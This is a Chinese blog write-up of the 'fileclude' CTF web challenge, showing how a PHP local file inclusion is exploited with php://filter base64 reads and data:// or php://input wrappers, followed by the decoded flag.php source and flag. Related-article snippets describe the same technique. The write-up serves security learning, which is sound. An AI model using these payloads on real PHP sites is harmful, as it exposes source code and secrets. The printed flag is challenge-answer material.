fileclude_攻防世界

最新推荐文章于 2024-04-20 10:00:00 发布
最新推荐文章于 2024-04-20 10:00:00 发布
阅读量429 收藏 7
点赞数 9
分类专栏: ctf记录 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52062236/article/details/135253559
版权

在这里插入图片描述
题目以html的形式给出了代码,但是可以看到代码的最前面出现了WRONG WAY! 结合 include("flag.php") ,可以知道这是 flag.php 的执行结果,而flag肯定在 flag.php中,我还需要拿到 flag.php 的源代码

再往下看,接收GET参数 file1和file2,如果两个参数都非空,并且file2的内容是hello ctf,就会调用 include($file1) ,因此我们可以使用 php://filter 伪协议来读取源代码

Solutions:

file1=php://filter/read=convert.base64-encode/resource=flag.php
file2=data://text/plain,hello ctf

file2=php://input      hello ctf

得到的结果解码

$ echo PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXs4MjJjMmZkMjA1MDc3MzJlNzkwYTJhNzE2YzBkZGRlZn0= | base64 -d

<?php
echo "WRONG WAY!";
// $flag = cyberpeace{822c2fd20507732e790a2a716c0dddef}
Vin0sen
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 fileclude 解题详析(php伪协议)
等风来
07-31 4503
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
攻防世界————fileclude(内含php伪协议菜鸟讲解)
weixin_62281892的博客
09-28 4029
文件包含以及涉及到的php伪协议
攻防世界-file_include
m0_49025459的博客
12-18 7005
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
攻防世界fileclude
m0_73303597的博客
11-07 1771
自用
攻防世界18.fileclude
最新发布
weixin_49765221的博客
04-20 1183
梅开二度-php的伪协议
攻防世界--fileclude && fileinclude && inget && easytornado
08-25 2243
file2中包含数据file_get_contents。直接访问flag.php只显示WRONG WAY!说明flag应该在flag.php的注释里。file2使用php伪协议传数据。两个参数file1和file2。
fileclude-CTF-攻防世界
szhangliwenya的博客
03-20 775
file1中用php://filter流来读取flag.php文件,同时用convert.iconv[]过滤器将flag编码输出,没有用convert.base64-encode因为出来的会是一串base64字符串,还要解密。file2中利用data://协议构造数据流,将hello ctf 当做php文件执行,直接传参行不通,因为file_get_contents是将文件中的数据提取我为字符串。对于大文件,应该考虑使用其他方法,如逐行读取文件或使用流(stream)处理。如果变量存在并且不是 NULL,
【愚公系列】2023年05月 攻防世界-Web(fileclude
时光隧道
05-24 8385
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序漏洞,攻击者可以通过Web应用程序的漏洞,以某种形式包含恶意文件,或者包含在Web服务器上的其他敏感文件,从而实现权限提升、信息泄露、远程代码执行等攻击。具体案例介绍包括://定义一个变量$file并将其传递给include函数中执行 $file = $_GET [ 'file' ];攻击者通过修改传递的$file变量,替换为恶意代码文件,最终实现远程代码执行攻击。
攻防世界fileclude
timeless_23333的博客
10-07 117
利用php中流的概念,将原本的include的文件流重定向到了用户可控制的输入流中命令执行,post请求输入想要执行的代码.用法:php://filter/read=convert.base64-encode/resourec=xxx.php。用法:data://text/plain,
攻防世界-fileclude
m0_62094846的博客
10-05 1170
file2满足条件file_get_contents($file2) === "hello ctf"才会执行file1。然后抓包,POST只保留hello ctf(如果直接在HackBar上写hello ctf,bp抓不了包,一定要加=)file1是最终要读取flag的,又是文件包含,用php://filter读取。不能让flag2直接等于hello ctf,要让hello ctf先包含进文件。所以可以用file2=php://input,POST写入hello ctf。然后base64解码。
攻防世界-file_include-详解
chinese_cabbage0的博客
02-04 1624
主要是这个题目的解题过程和原理,可以帮助大家学习文件包含漏洞
[攻防世界]-Web:fileclude解析
2301_79326813的博客
03-01 223
查看网页。
Web安全攻防世界02 fileclude(ctf)
weixin_42789937的博客
11-27 1828
攻防世界02,Web安全题目fileclude(ctf),文件包含入门题目,参考大佬们的WP有所补充,内容对小白友好~
攻防世界】学习记录-web(系数1 part2)
龟速更新的九某人
08-13 4396
攻防世界】学习记录-web(系数1 part2) 0482 weak_auth 0485 simple_php 0712 baby_web 1004 inget 1005 easyupload 1007 fileinclude 1008 very_easy_sql 1010 fileclude
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值